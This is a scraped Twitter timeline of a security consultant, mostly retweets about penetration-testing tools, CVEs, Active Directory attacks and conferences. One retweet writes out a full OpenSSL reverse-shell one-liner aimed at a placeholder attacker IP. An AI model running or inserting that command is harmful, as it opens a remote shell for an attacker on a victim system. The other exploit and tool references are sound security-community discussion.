Twitter | Search | |
Eric Smith
Consultant, Therapist. Persistent SoB. I don't like to lose. Your systems sure do look appetizing.
3,567
Tweets
767
Following
3,747
Followers
Tweets
Eric Smith retweeted
GrrCON 16h
If you haven’t been to GrrCON you’re missing out. Old school hacker con without the cliquey drama or endless lines. Do yourself a favor and submit a CFP.
Reply Retweet Like
Eric Smith retweeted
JayK Feb 20
Reverse Shell with OpenSSL low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
Reply Retweet Like
Eric Smith retweeted
Jacob Baines Feb 21
Follow up to my last MikroTik blog, I found a remote, unauthenticated attacker can proxy crafted UDP/TCP traffic through RouterOS's winbox port. Assigned CVE-2019-3924. In my write up, I bypass the firewall to exploit a LAN target:
Reply Retweet Like
Eric Smith retweeted
strandjs Feb 16
Windows subsystem for Linux keeps getting better.. Now, if they could only fix the Sockets issue so tools like Nmap and tcpdump worked..
Reply Retweet Like
Eric Smith retweeted
L0phtCrack Feb 17
L0phtCrack 7.1.1 Released - Download is here: Changelog is here
Reply Retweet Like
Eric Smith Feb 14
Replying to @vyrus001
Depends if you are the one making it?
Reply Retweet Like
Eric Smith retweeted
Dirk-jan Feb 11
If you're using the ACL attack in ntlmrelayx (for example with ), it now saves a restore file that you can feed to aclpwn which can restore the original permissions on the domain object. This and some fixes now in the latest impacket version on GitHub!
Reply Retweet Like
Eric Smith retweeted
Ronnie Flathers Feb 12
Oh yeah...coming together very nicely! A little sneak peek of something I'm working on for my talk coming up. Multithreaded Go + Kerberos over UDP = damn this thing is fast 😳
Reply Retweet Like
Eric Smith retweeted
BrianHonan Feb 12
Healthcare email fraud: Attack attempts jump 473% over two years
Reply Retweet Like
Eric Smith retweeted
Elad Shamir Feb 12
My teammate Chris Moberly () just dropped a beautiful LPE on stock Ubuntu and derivatives - “dirty_sock” Nice work, Chris!
Reply Retweet Like
Eric Smith retweeted
Chris Frohoff Feb 12
Looks like another unsafe java deserialization RCE vuln in Adobe ColdFusion
Reply Retweet Like
Eric Smith retweeted
Will Feb 6
Sidenote for anyone interested, instructions on using Rubeus as a library and/or running Rubeus through PowerShell are now up on the
Reply Retweet Like
Eric Smith Feb 5
Replying to @Niki7a
Don't pull me into this shitstorm. I'm not part of any conference org, specifically BSidesATL.
Reply Retweet Like
Eric Smith retweeted
𝖎𝖑𝖑𝖜𝖎𝖑𝖑 Feb 5
Reply Retweet Like
Eric Smith retweeted
Jamie Shaw Feb 3
Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques -
Reply Retweet Like
Eric Smith retweeted
Zach Grace'-- Feb 3
Although we didn't make use of it at , looks like the Empire telemetry I've been developing worked. Hopefully I can build this out a bit more and we can use this for some objective measurements in next year's competition.
Reply Retweet Like
Eric Smith retweeted
b33f Feb 4
I hope defenders have taken note of PrivExchange and kicked their Admin's into action. Don't make me come and investigate that meltdown 👻. Check out this post by -> and the execute-assembly evil by ->
Reply Retweet Like
Eric Smith retweeted
Andrew Robbins Jan 31
1/n - Here's how can help you determine whether you are vulnerable to PrivExchange by : Find the domain head object in the BloodHound GUI, click the number next to "First Degree Controllers". See whether an Exchange security group is present:
Reply Retweet Like
Eric Smith retweeted
Martin Gallo 🇦🇷 💚 Jan 30
For those playing with 's Impacket ntlmrelayx and experiencing delays when relaying to LDAP, just landed an option to avoid enumerating privileges and assume the relayed user have them. Specially handing for when using 's PrivExchange!
Reply Retweet Like
Eric Smith retweeted
Red Canary Jan 21
Take a deep dive into ATT&CK tactic TA0008. Join , , , and as we take lessons learned from and apply those detection strategies to find other threats.
Reply Retweet Like